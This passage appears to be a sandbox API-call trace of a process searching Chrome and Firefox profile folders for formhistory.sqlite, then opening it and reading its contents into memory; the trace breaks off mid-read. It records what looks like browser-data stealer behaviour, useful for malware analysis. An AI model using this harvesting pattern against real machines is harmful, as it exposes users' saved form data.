returned 0 [0591.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.082] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.082] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.082] LocalFree (hMem=0x63eb80) returned 0x0 [0591.082] LocalFree (hMem=0x63ea58) returned 0x0 [0591.082] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.082] lstrcmpiW (lpString1="SwReporter", lpString2=".") returned 1 [0591.082] lstrcmpiW (lpString1="SwReporter", lpString2="..") returned 1 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.082] lstrlenW (lpString="\\") returned 1 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e3098 [0591.082] lstrlenW (lpString="SwReporter") returned 10 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0x106) returned 0x5ed7a0 [0591.082] LocalFree (hMem=0x5e3098) returned 0x0 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0591.082] lstrlenW (lpString="\\*.*") returned 4 [0591.082] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned 66 [0591.082] LocalAlloc (uFlags=0x40, uBytes=0x10e) returned 0x5edc00 [0591.082] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.082] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.082] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.082] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.083] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.083] LocalFree (hMem=0x5edc00) returned 0x0 [0591.083] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.083] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 1 [0591.083] lstrcmpiW (lpString1="WidevineCdm", lpString2=".") returned 1 [0591.083] lstrcmpiW (lpString1="WidevineCdm", lpString2="..") returned 1 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.083] lstrlenW (lpString="\\") returned 1 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data") returned 55 [0591.083] LocalAlloc (uFlags=0x40, uBytes=0xf2) returned 0x5e3098 [0591.083] lstrlenW (lpString="WidevineCdm") returned 11 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 56 [0591.083] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed7a0 [0591.083] LocalFree (hMem=0x5e3098) returned 0x0 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0591.083] lstrlenW (lpString="\\*.*") returned 4 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm") returned 67 [0591.083] LocalAlloc (uFlags=0x40, uBytes=0x110) returned 0x5edc00 [0591.083] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*.*", lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0x57c9a0 [0591.083] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 1 [0591.083] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.083] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.083] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db98 | out: lpFindFileData=0x52db98) returned 0 [0591.083] FindClose (in: hFindFile=0x57c9a0 | out: hFindFile=0x57c9a0) returned 1 [0591.083] LocalFree (hMem=0x5edc00) returned 0x0 [0591.083] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.083] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de14 | out: lpFindFileData=0x52de14) returned 0 [0591.083] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0591.083] LocalFree (hMem=0x5d7c90) returned 0x0 [0591.083] LocalFree (hMem=0x5e6f98) returned 0x0 [0591.083] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e090 | out: lpFindFileData=0x52e090) returned 0 [0591.083] FindClose (in: hFindFile=0x57d1e0 | out: hFindFile=0x57d1e0) returned 1 [0591.083] LocalFree (hMem=0x2ed2ab0) returned 0x0 [0591.083] LocalFree (hMem=0x2ed0060) returned 0x0 [0591.083] LocalAlloc (uFlags=0x40, uBytes=0x28a) returned 0x5eb208 [0591.083] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5eb208 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0591.083] lstrlenW (lpString="\\Mozilla\\Firefox") returned 16 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 33 [0591.083] LocalAlloc (uFlags=0x40, uBytes=0xe4) returned 0x2ed2ab0 [0591.083] LocalFree (hMem=0x5eb208) returned 0x0 [0591.083] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] lstrlenW (lpString="\\*.*") returned 4 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5e6f98 [0591.084] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\*.*", lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 0x57d1e0 [0591.084] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.084] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 1 [0591.084] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.084] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.084] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 1 [0591.084] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0591.084] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] lstrlenW (lpString="\\") returned 1 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2060 [0591.084] lstrlenW (lpString="Crash Reports") returned 13 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0x100) returned 0x63f8c8 [0591.084] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0591.084] lstrlenW (lpString="\\*.*") returned 4 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0x108) returned 0x5ed7a0 [0591.084] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*.*", lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 0x57ca60 [0591.084] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.084] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 1 [0591.084] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.084] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.084] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 1 [0591.084] lstrlenW (lpString="\\") returned 1 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 63 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5edc00 [0591.084] lstrlenW (lpString="InstallTime20131025151332") returned 25 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 64 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dc458 [0591.084] LocalFree (hMem=0x5edc00) returned 0x0 [0591.084] StrStrIW (lpFirst="InstallTime20131025151332", lpSrch="formhistory.sqlite") returned 0x0 [0591.084] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 0 [0591.084] FindClose (in: hFindFile=0x57ca60 | out: hFindFile=0x57ca60) returned 1 [0591.084] LocalFree (hMem=0x5ed7a0) returned 0x0 [0591.084] LocalFree (hMem=0x63f8c8) returned 0x0 [0591.084] FindNextFileW (in: hFindFile=0x57d1e0, lpFindFileData=0x52e0b4 | out: lpFindFileData=0x52e0b4) returned 1 [0591.084] lstrcmpiW (lpString1="Profiles", lpString2=".") returned 1 [0591.084] lstrcmpiW (lpString1="Profiles", lpString2="..") returned 1 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] lstrlenW (lpString="\\") returned 1 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox") returned 49 [0591.084] LocalAlloc (uFlags=0x40, uBytes=0xe6) returned 0x2ed2060 [0591.084] lstrlenW (lpString="Profiles") returned 8 [0591.084] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 50 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0xf6) returned 0x5e3098 [0591.085] LocalFree (hMem=0x2ed2060) returned 0x0 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0591.085] lstrlenW (lpString="\\*.*") returned 4 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0xfe) returned 0x63f8c8 [0591.085] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.*", lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 0x57ca60 [0591.085] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.085] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 1 [0591.085] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.085] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.085] FindNextFileW (in: hFindFile=0x57ca60, lpFindFileData=0x52de38 | out: lpFindFileData=0x52de38) returned 1 [0591.085] lstrcmpiW (lpString1="3y2joh8o.default", lpString2=".") returned 1 [0591.085] lstrcmpiW (lpString1="3y2joh8o.default", lpString2="..") returned 1 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0591.085] lstrlenW (lpString="\\") returned 1 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles") returned 58 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0xf8) returned 0x5e3198 [0591.085] lstrlenW (lpString="3y2joh8o.default") returned 16 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned 59 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x118) returned 0x63ea58 [0591.085] LocalFree (hMem=0x5e3198) returned 0x0 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.085] lstrlenW (lpString="\\*.*") returned 4 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x120) returned 0x63eb80 [0591.085] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\*.*", lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 0x57c9a0 [0591.085] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.085] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.085] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.085] lstrlenW (lpString="\\") returned 1 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.085] lstrlenW (lpString="addons.json") returned 11 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x2edb860 [0591.085] LocalFree (hMem=0x63eca8) returned 0x0 [0591.085] StrStrIW (lpFirst="addons.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.085] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.085] lstrcmpiW (lpString1="bookmarkbackups", lpString2=".") returned 1 [0591.085] lstrcmpiW (lpString1="bookmarkbackups", lpString2="..") returned 1 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.085] lstrlenW (lpString="\\") returned 1 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.085] lstrlenW (lpString="bookmarkbackups") returned 15 [0591.085] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.085] LocalAlloc (uFlags=0x40, uBytes=0x138) returned 0x5dc5a0 [0591.085] LocalFree (hMem=0x63eca8) returned 0x0 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0591.086] lstrlenW (lpString="\\*.*") returned 4 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x5dc6e8 [0591.086] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\*.*", lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0x5b9b50 [0591.086] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0591.086] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.086] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0591.086] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0591.086] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.086] lstrlenW (lpString="\\") returned 1 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dc830 [0591.086] lstrlenW (lpString="bookmarks-2017-06-30_5.json") returned 27 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x2ede850 [0591.086] LocalFree (hMem=0x5dc830) returned 0x0 [0591.086] StrStrIW (lpFirst="bookmarks-2017-06-30_5.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.086] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 1 [0591.086] lstrlenW (lpString="\\") returned 1 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups") returned 91 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dc830 [0591.086] lstrlenW (lpString="bookmarks-2017-07-26_5.json") returned 27 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\") returned 92 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x170) returned 0x2ede9c8 [0591.086] LocalFree (hMem=0x5dc830) returned 0x0 [0591.086] StrStrIW (lpFirst="bookmarks-2017-07-26_5.json", lpSrch="formhistory.sqlite") returned 0x0 [0591.086] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d940 | out: lpFindFileData=0x52d940) returned 0 [0591.086] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0591.086] LocalFree (hMem=0x5dc6e8) returned 0x0 [0591.086] LocalFree (hMem=0x5dc5a0) returned 0x0 [0591.086] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.086] lstrlenW (lpString="\\") returned 1 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.086] lstrlenW (lpString="cert8.db") returned 8 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x2edb998 [0591.086] LocalFree (hMem=0x63eca8) returned 0x0 [0591.086] StrStrIW (lpFirst="cert8.db", lpSrch="formhistory.sqlite") returned 0x0 [0591.086] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.086] lstrlenW (lpString="\\") returned 1 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.086] lstrlenW (lpString="compatibility.ini") returned 17 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dc5a0 [0591.086] LocalFree (hMem=0x63eca8) returned 0x0 [0591.086] StrStrIW (lpFirst="compatibility.ini", lpSrch="formhistory.sqlite") returned 0x0 [0591.086] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.086] lstrlenW (lpString="\\") returned 1 [0591.086] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.086] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.086] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x142) returned 0x2edeb40 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="content-prefs.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.087] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.087] lstrlenW (lpString="\\") returned 1 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.087] lstrlenW (lpString="cookies.sqlite") returned 14 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dc6e8 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="cookies.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.087] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.087] lstrlenW (lpString="\\") returned 1 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.087] lstrlenW (lpString="downloads.sqlite") returned 16 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x5dc830 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="downloads.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.087] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.087] lstrlenW (lpString="\\") returned 1 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.087] lstrlenW (lpString="extensions.ini") returned 14 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x136) returned 0x5dc978 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="extensions.ini", lpSrch="formhistory.sqlite") returned 0x0 [0591.087] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.087] lstrlenW (lpString="\\") returned 1 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.087] lstrlenW (lpString="extensions.sqlite") returned 17 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x5dcac0 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="extensions.sqlite", lpSrch="formhistory.sqlite") returned 0x0 [0591.087] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52dbbc | out: lpFindFileData=0x52dbbc) returned 1 [0591.087] lstrlenW (lpString="\\") returned 1 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63eca8 [0591.087] lstrlenW (lpString="formhistory.sqlite") returned 18 [0591.087] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0591.087] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dcc08 [0591.087] LocalFree (hMem=0x63eca8) returned 0x0 [0591.087] StrStrIW (lpFirst="formhistory.sqlite", lpSrch="formhistory.sqlite") returned="formhistory.sqlite" [0591.087] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52db98 | out: ppstm=0x52db98*=0x63a0a8) returned 0x0 [0591.087] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0591.087] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, lpBuffer=0x52cb90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52cb88, lpOverlapped=0x0 | out: lpBuffer=0x52cb90*, lpNumberOfBytesRead=0x52cb88*=0x1000, lpOverlapped=0x0) returned 1 [0591.088] IStream:Commit (This=0x63a0a8, grfCommitFlags=0x52cb90) returned 0x0 [0591.088] ReadFile (in: hFile=0x660, 